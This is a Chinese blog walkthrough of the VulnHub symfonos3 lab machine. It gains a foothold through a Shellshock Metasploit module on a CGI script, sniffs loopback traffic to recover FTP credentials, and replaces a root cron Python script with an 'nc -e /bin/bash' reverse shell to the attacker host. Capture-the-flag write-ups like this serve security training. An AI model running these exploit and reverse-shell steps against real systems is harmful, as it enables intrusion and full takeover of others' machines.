vulnhub之symfonos3的实践

  • A+
所属分类:安全文章

本周实践的是vulnhub的symfonos3镜像,下载地址,https://download.vulnhub.com/symfonos/symfonos3v2.7z,

靶机启动就能看到地址,也就不用扫了,

vulnhub之symfonos3的实践

进行端口扫描,sudo nmap -sS -sV -T4 -A -p- 192.168.137.71,

ftp,ssh,web,就这几个服务,

vulnhub之symfonos3的实践

对web服务继续目录爆破,sudo dirb http://192.168.137.71,

vulnhub之symfonos3的实践

再用dirbuster对cgi-bin目录进一步爆破,

vulnhub之symfonos3的实践

能看到有underworld子目录,

vulnhub之symfonos3的实践

浏览器访问这个underworld子目录,这里猜测调用了shell命令,进一步怀疑是否有shellshock漏洞,

vulnhub之symfonos3的实践

直接简单粗暴的上metasploit,搜索相关利用,search shellshock,

vulnhub之symfonos3的实践

就用这个吧,use exploit/multi/http/apache_mod_cgi_bash_env_exec,

set RHOSTS 192.168.137.71,set TARGETURI /cgi-bin/underworld,

vulnhub之symfonos3的实践

执行,拿到meterpreter shell,但不是root,需要想办法提权,

vulnhub之symfonos3的实践

这里引入一个查找root权限运行程序的神器,pspy,下载地址,

https://github.com/DominicBreuker/pspy,咱们这里下载pspy32,

然后传到靶机,cd /tmp,upload /home/kali/pspy32,

转成shell,并进一步变成交互式的,

shell,python -c 'import pty;pty.spawn("/bin/bash")',

改执行权限并执行,chmod 777 pspy32,./pspy32,

看到一个ftpclient.py是root权限定时执行的程序,

vulnhub之symfonos3的实践

发现当前账户没有操作ftpclient.py的权限,需要再找其它账户,

这里的思路是,在本地抓包,看看能否得到相关的信息,

cd /tmp,tcpdump -D,tcpdump -i lo -w file.pcap,

vulnhub之symfonos3的实践

把抓包文件下载到外面查看,得到了hades/PTpZTfU4vxgzvRBE账户信息,

vulnhub之symfonos3的实践

用这个账户信息直接ssh靶机,这回就有权限操作ftpclient.py了,

rm /opt/ftpclient/ftpclient.py,vi /opt/ftpclient/ftpclient.py,
import sys
import os
os.system("nc -e /bin/bash 192.168.137.83 1234")

在攻击机上开个监听,nc -lvp 1234,等一会儿就能拿到新的shell了,

vulnhub之symfonos3的实践

至此成功拿到root权限。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: